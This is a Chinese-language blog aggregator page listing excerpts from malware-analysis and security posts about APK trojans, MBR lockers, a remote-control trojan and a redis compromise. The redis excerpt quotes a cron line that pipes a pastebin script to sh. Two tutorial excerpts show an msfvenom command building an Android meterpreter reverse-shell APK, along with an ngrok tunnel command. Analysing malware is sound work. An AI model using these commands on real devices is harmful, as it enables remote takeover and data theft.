原文:一次簡單的分析手機APK病毒木馬

寫個筆記記錄一下,起因是朋友在QQ上發了個連接叫我看看 安不安全,叫我幫他看看,反正在店里待着也沒生意,那就順便看看咯。 打開這個網址 會自動彈出下載一個名為OOXX的APK安裝包。 起先我的思路是想先從這個網站下手 先搞定這個網站或者服務器吧, 然后我就去網站主頁看了下。是一個網址縮短 變形 的網站。 那么我們給地址還原成真實地址,http: . . . : ooxx.apk 這就是真實的網址。 ...

2016-01-07 16:43 1 5283 推薦指數:

查看詳情

一次MBR鎖病毒分析

有一天,在機緣巧合之下我獲得了一個鎖軟件(是多巧合阿喂!),然后興高采烈的把它拖入了虛擬里蹂躪(>_<!)。 很巧,軟件有虛擬檢測。。。 Emmmm好吧,隨便過一下。。。 我用的虛擬是VMware12,網上查到了一段過檢測的代碼 ...

Fri Dec 08 02:17:00 CST 2017 0 1081
一次病毒分析之旅

0x00 前言 這個病毒應該是比較簡單的,別人給我的樣本,讓我幫忙看看,看樣子是很早的一個病毒,針對Windows XP系統的,行為分析簡單,但是想着不能就僅僅分析關鍵點,要不就把整個結構給逆向出來,弄了兩天,搞的差不多了,簡單的記錄一下。 0x01 基本介紹 整個病毒是4個文件組成 ...

Tue Jan 05 04:58:00 CST 2016 17 4101
使用Kali的metasploit生成安卓APK木馬控制安卓手機

使用Kali的metasploit生成安卓APK木馬控制安卓手機 前提:在虛擬里面安裝kali系統,再就是本機安裝一個夜神模擬器,和一個安卓5的環境 如果不會的話,可以報名跟我們學習,聯系方式hk007.cn 第一步:在終端輸入ip addr命令查看kali主機的IP地址 ...

Mon Dec 07 06:32:00 CST 2020 0 3367
病毒木馬防御與分析

病毒包和工具包下載:Github 一.前言 二.建立對手動查殺病毒技術的正確認識 1.病毒分析方法 2.病毒查殺步驟 3.必備知識 * 1) 熟悉windows系統進程 * 2) 熟悉常見端口與進程對應關系 * 3) 熟悉windows自帶系統服務 ...

Wed Jan 16 02:07:00 CST 2019 4 775
【原創】一次遠控木馬分析

病毒來源:朋友服務器發現此木馬 當時為了提樣本搞了很久,一直找恢復文件,對提取樣本有研究的朋友還請指導指導。 文件名:vister.exe MD5:30866adc2976704bca0f051b5474a1ee 此處創建了一個進程 申明了一個2800大小 ...

Sat Jan 20 01:54:00 CST 2018 0 1606
一次redis病毒分析筆記

起因 偶然間發現redis里有一個陌生key:tightsoft,它的值是:*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道這肯定不是我們存的,再看value我警覺了,這是要定時執行腳本啊。 分析 ...

Wed Sep 05 23:13:00 CST 2018 2 944
msfconsole弄外網手機木馬

創建個通道./ngrok tcp 1113 msfvenom -p android/meterpreter/reverse_tcp LHOST=52.15.62.13 LPORT=17016 R > ttxd.apk 現在我把這個apk導入到手機上然后運行 ...

Wed Jun 07 23:37:00 CST 2017 0 2509
一次小米手機安裝Google Play(其他手機類似)

一次小米手機安裝Google Play(其他手機類似) 最近換了一款小米10青春版,性價比很高,對於開發者而言,手機自帶商店的軟件內容往往不能滿足需求,而需要單獨定制習慣性的APP,博主通過最近的嘗試,已經成功將內容安裝到手機,並分享整理如下。 手機:小米10青春版 版本 ...

Tue Feb 16 18:18:00 CST 2021 0 2622
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM